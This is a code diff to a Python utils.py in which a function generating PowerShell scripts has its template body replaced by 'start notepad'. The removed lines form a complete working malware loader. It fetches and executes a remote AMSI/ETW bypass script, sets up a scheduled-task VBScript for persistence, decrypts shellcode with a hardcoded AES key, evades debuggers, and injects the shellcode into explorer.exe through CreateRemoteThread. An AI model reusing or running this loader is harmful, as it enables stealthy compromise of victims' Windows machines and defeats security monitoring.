Update utils.py

utils.py

@@ -211,108 +211,7 @@ def process_request(request):
 
         # Create the PowerShell script with the provided content
         ps1_content = f'''
-# Download and execute the script from the provided URL
-iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1)
-# Run the Invoke-NullAMSI command
-Invoke-NullAMSI
-Invoke-NullAMSI -etw
-# Define the content of the VBScript
-$vbsContent = @'
-Set objShell = CreateObject("WScript.Shell")
-objShell.Run "powershell -EP Bypass -File \\"C:\\ProgramData\\Installer\\Verification.ps1\\"", 0, True
-'@
-# Define the file path for the .vbs file in the desired location
-$vbsFilePath = "C:\\ProgramData\\Installer\\0.vbs"
-# Write the content to the .vbs file
-$vbsContent | Set-Content -Path $vbsFilePath -Encoding ASCII
-Write-Host "VBScript file created at: $vbsFilePath"
-$Action = New-ScheduledTaskAction -Execute "C:\\ProgramData\\Installer\\0.vbs"
-$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
-Register-ScheduledTask -TaskName "HiPPo Setting" -Action $Action -Trigger $Trigger -Force
-# Define a fixed 16-byte key for encryption (fixed key as "MyFixedEncryptionKey")
-$keyBytes = [System.Text.Encoding]::UTF8.GetBytes("MyFixedEncryptionKey")
-# Ensure the key length is 16 bytes (AES requires 16, 24, or 32 bytes)
-if ($keyBytes.Length -gt 16) {{
-    $keyBytes = $keyBytes[0..15]  # Trim the key to 16 bytes if it's longer
-}}
-elseif ($keyBytes.Length -lt 16) {{
-    # If the key is too short, pad it with zeros to make it 16 bytes
-    $keyBytes = $keyBytes + (New-Object Byte[] (16 - $keyBytes.Length))
-}}
-# Function to download the encrypted binary from the server
-function Download-EncryptedShellcode {{
-    param([string]$url)
-    # Download the encrypted binary file directly into memory as a byte array
-    $response = Invoke-WebRequest -Uri $url -UseBasicParsing
-    return $response.Content
-}}
-# Read the encrypted shellcode from a local binary file
-$encryptedBuf = [System.IO.File]::ReadAllBytes("C:\\ProgramData\\Installer\\{bin_file_name}")
-# Create an AES encryption object
-$aes = [System.Security.Cryptography.Aes]::Create()
-# Set the decryption key and initialization vector (IV)
-$aes.Key = $keyBytes
-$aes.IV = $keyBytes[0..15]  # Use the first 16 bytes of the key for the IV
-# Create a memory stream to hold the decrypted data
-$memoryStream = New-Object System.IO.MemoryStream
-$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
-# Decrypt the encrypted data into the memory stream
-$cryptoStream.Write($encryptedBuf, 0, $encryptedBuf.Length)
-$cryptoStream.Close()
-# Get the decrypted shellcode
-$buf = $memoryStream.ToArray()
-# Anti-debugging mechanism
-function IsDebuggerPresent {{
-    $IsDebuggerPresentCode = @"
-    using System;
-    using System.Runtime.InteropServices;
-    public class DebugHelper {{
-        [DllImport(\\"kernel32.dll\\")]
-        public static extern bool IsDebuggerPresent();
-    }}
-"@
-    $debugHelper = Add-Type -TypeDefinition $IsDebuggerPresentCode -PassThru
-    return $debugHelper::IsDebuggerPresent()
-}}
-if (IsDebuggerPresent) {{
-    Write-Host "Debugger detected. Exiting."
-    exit
-}}
-# Inject shellcode into a target process (example: explorer.exe)
-$Win32APICode = @"
-using System;
-using System.Runtime.InteropServices;
-public class Win32API {{
-    [DllImport(\\"kernel32.dll\\", SetLastError = true, ExactSpelling = true)]
-    public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
-    [DllImport(\\"kernel32.dll\\", SetLastError = true)]
-    public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
-    [DllImport(\\"kernel32.dll\\", SetLastError = true)]
-    public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
-    [DllImport(\\"kernel32.dll\\", SetLastError = true)]
-    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
-    [DllImport(\\"kernel32.dll\\", SetLastError = true)]
-    [return: MarshalAs(UnmanagedType.Bool)]
-    public static extern bool CloseHandle(IntPtr hObject);
-}}
-"@
-$win32api = Add-Type -TypeDefinition $Win32APICode -PassThru
-# Target process (explorer.exe) injection
-$targetProcess = Get-Process explorer | Select-Object -First 1
-$processHandle = $win32api::OpenProcess(0x1F0FFF, $false, $targetProcess.Id)
-# Allocate memory in the target process
-$size = 0x1000
-if ($buf.Length -gt $size) {{ $size = $buf.Length }}
-$remoteMemory = $win32api::VirtualAllocEx($processHandle, [IntPtr]::Zero, $size, 0x3000, 0x40)
-# Write the shellcode into the allocated memory
-$bytesWritten = [IntPtr]::Zero
-$win32api::WriteProcessMemory($processHandle, $remoteMemory, $buf, $buf.Length, [ref]$bytesWritten)
-# Create a remote thread to execute the shellcode
-$threadId = [IntPtr]::Zero
-$win32api::CreateRemoteThread($processHandle, [IntPtr]::Zero, 0, $remoteMemory, [IntPtr]::Zero, 0, [ref]$threadId)
-# Close the process handle
-$win32api::CloseHandle($processHandle)
-Write-Host "Shellcode injection completed successfully."
+start notepad
 '''
         ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
         with open(ps1_path, 'w') as ps1_file: